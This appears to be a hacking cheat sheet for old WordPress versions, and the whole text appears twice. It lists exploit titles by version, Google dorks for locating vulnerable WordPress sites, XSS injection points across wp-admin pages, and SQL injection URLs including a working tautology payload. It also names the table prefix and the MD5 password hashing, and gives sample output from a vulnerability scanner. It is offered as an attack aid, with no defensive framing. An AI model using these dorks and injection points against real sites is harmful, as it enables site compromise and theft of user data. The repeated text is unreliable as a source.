Vulnerabilities:
Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)
Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability
Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability
1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability
Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability
Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability
1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (****sploit)
Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit
Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit
WordPress <= 1.5.1.1 SQL Injection Exploit
WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit
2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit
Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit
Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit
2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit
Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit
2.*
Wordpress <= 2.x dictionnary & Bruteforce attack
WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit
Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
dork:
Code:
"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp exthp
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetypehp
intext:"powered by WordPress" filetypehp -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
exthp inurl:"wp-login.php" -cvs
Full path disclosure:
WordPress < 1.5.2
Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]
SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100) or 0=0 or (0=1
Tables/Prefix_/Columns:
wp_
Hash algorithms:
md5(password)
WordPress Vulnerability Scanner
Code:
$ perl -x wp-scanner.pl http://testblog/wordpress/
WordPress Scanner starting: David Kierznowski (Michael Daw - On Security)
Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration
[*] Finding WordPress Major Version
[*] Testing WordPress Template for XSS
WordPress Basic Results
wp-commentsrss2.php => Version Leak: WordPress 2.1.3
wp-links-opml.php => Version Leak: WordPress 2.1.3
wp-major-ver => Version 2.1
wp-rdf.php => Version Leak: WordPress 2.1.3
wp-rss.php => Version Leak: WordPress 2.1.3
wp-rss2.php => Version Leak: WordPress 2.1.3
wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
wp-title => Test Blog
wp-version => WordPress 2.1.3
x-Pingback => http://testblog/wordpress/xmlrpc.php
WordPress Plugins Found
wp-plugins[0] => Akismet
Download
Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)
Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability
Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability
1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability
Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability
Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability
1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (****sploit)
Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit
Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit
WordPress <= 1.5.1.1 SQL Injection Exploit
WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit
2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit
Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit
Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit
2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit
Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit
2.*
Wordpress <= 2.x dictionnary & Bruteforce attack
WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit
Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
dork:
Code:
"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp exthp
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetypehp
intext:"powered by WordPress" filetypehp -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
exthp inurl:"wp-login.php" -cvs
Full path disclosure:
WordPress < 1.5.2
Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]
SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100) or 0=0 or (0=1
Tables/Prefix_/Columns:
wp_
Hash algorithms:
md5(password)
WordPress Vulnerability Scanner
Code:
$ perl -x wp-scanner.pl http://testblog/wordpress/
WordPress Scanner starting: David Kierznowski (Michael Daw - On Security)
Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration
[*] Finding WordPress Major Version
[*] Testing WordPress Template for XSS
WordPress Basic Results
wp-commentsrss2.php => Version Leak: WordPress 2.1.3
wp-links-opml.php => Version Leak: WordPress 2.1.3
wp-major-ver => Version 2.1
wp-rdf.php => Version Leak: WordPress 2.1.3
wp-rss.php => Version Leak: WordPress 2.1.3
wp-rss2.php => Version Leak: WordPress 2.1.3
wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
wp-title => Test Blog
wp-version => WordPress 2.1.3
x-Pingback => http://testblog/wordpress/xmlrpc.php
WordPress Plugins Found
wp-plugins[0] => Akismet
Download